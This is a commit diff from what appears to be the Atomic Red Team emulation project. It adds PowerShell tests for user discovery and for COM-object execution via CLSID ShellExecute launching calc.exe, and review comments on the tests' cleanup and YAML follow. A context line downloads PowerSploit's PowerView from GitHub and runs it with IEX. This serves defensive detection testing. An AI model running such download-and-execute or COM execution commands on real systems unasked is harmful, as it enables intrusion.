Powershell tactics (#1825)

* Update T1112.yaml

* Update T1112.yaml

* typos

* Update T1033.yaml

* Update T1033.yaml

* Update T1546.015.yaml

* Update T1546.015.yaml

* Update T1033.yaml

* Update T1546.015.yaml

* Update T1546.015.yaml

* Update T1546.015.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
tccontre
2022-03-23 18:44:16 +01:00
committed by GitHub
parent bd96789f31
commit a41a63ffd9
2 changed files with 37 additions and 0 deletions
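--- a/T1033.yaml
+++ b/T1033.yaml
@@ -51,3 +51,26 @@ atomic_tests:
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
 name: powershell
+- name: User Discovery With Env Vars PowerShell Script
+auto_generated_guid: dcb6cdee-1fb0-4087-8bf8-88cfd136ba51
+description: Use the PowerShell environment variables to identify the current logged user.
+supported_platforms:
+- windows
+executor:
+command: |
+[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt
+$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
+cleanup_command: |
+Remove-Item -Path .\CurrentactiveUser.txt -Force
+name: powershell
+- name: GetCurrent User with PowerShell Script
+auto_generated_guid: 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b
+description: Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.
+supported_platforms:
+- windows
+executor:
+command: |
+[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
+cleanup_command: |
+Remove-Item -Path .\CurrentUserObject.txt -Force
+name: powershell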
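Review bot: The cleanup commands of both new tests (`Remove-Item -Path .\CurrentactiveUser.txt -Force` and `Remove-Item -Path .\CurrentUserObject.txt -Force`) raise an error when the output file was never written, whereas the existing cleanup in this commit's other file suppresses that with `-ErrorAction Ignore`; `Remove-Item -Path .\CurrentactiveUser.txt -Force -ErrorAction Ignore` (and the same for the second test) would keep cleanup idempotent. Both tests also write into the current working directory rather than a fixed location, so the artifact's path depends on where the runner was launched, which anyone building a detection on the file write should know. The descriptions read "the current logged user" and "the logged user"; "the currently logged-on user" is the usual phrasing. The first description could also state that `[System.Environment]::UserName` and `$env:UserName` are two ways of reading the same value, which is why the second write is appended to the same file.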
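--- a/T1546.015.yaml
+++ b/T1546.015.yaml
@@ -40,3 +40,17 @@ atomic_tests:
 cleanup_command: |-
 Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
 name: powershell
+- name: Powershell Execute COM Object
+auto_generated_guid: 752191b1-7c71-445c-9dbe-21bb031b18eb
+description: Use the PowerShell to execute COM CLSID object.
+Reference: https://pentestlab.blog/2020/05/20/persistence-com-hijacking/
+supported_platforms:
+- windows
+executor:
+command: |
+$o= [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39"))
+$item = $o.Item()
+$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
+cleanup_command: |
+Get-Process -Name "*calc" | Stop-Process
+name: powershell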
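Review bot: The CLSID on the `$o= [activator]::CreateInstance(...)` line is hard-coded, while the test just above this hunk already takes the CLSID as an input argument (`#{clsid}` in its cleanup); writing it as `[type]::GetTypeFromCLSID("#{clsid}")` with a matching `input_arguments` entry whose default is `9BA05972-F6A8-11CF-A442-00A0C90A8F39` would keep the file consistent. The cleanup `Get-Process -Name "*calc" | Stop-Process` matches on a name suffix, so on Windows builds where calc.exe hands off to the Store Calculator app (process name `Calculator` or `CalculatorApp`) the launched process would presumably survive cleanup; matching both names would be safer. Unless `description` is a block scalar, its `Reference: https://...` continuation line contains `: `, which a plain YAML scalar cannot hold; `description: |` on the line above would make the two-line value valid. "Use the PowerShell to execute COM CLSID object" should read "Use PowerShell to instantiate a COM object by CLSID and call a method on it".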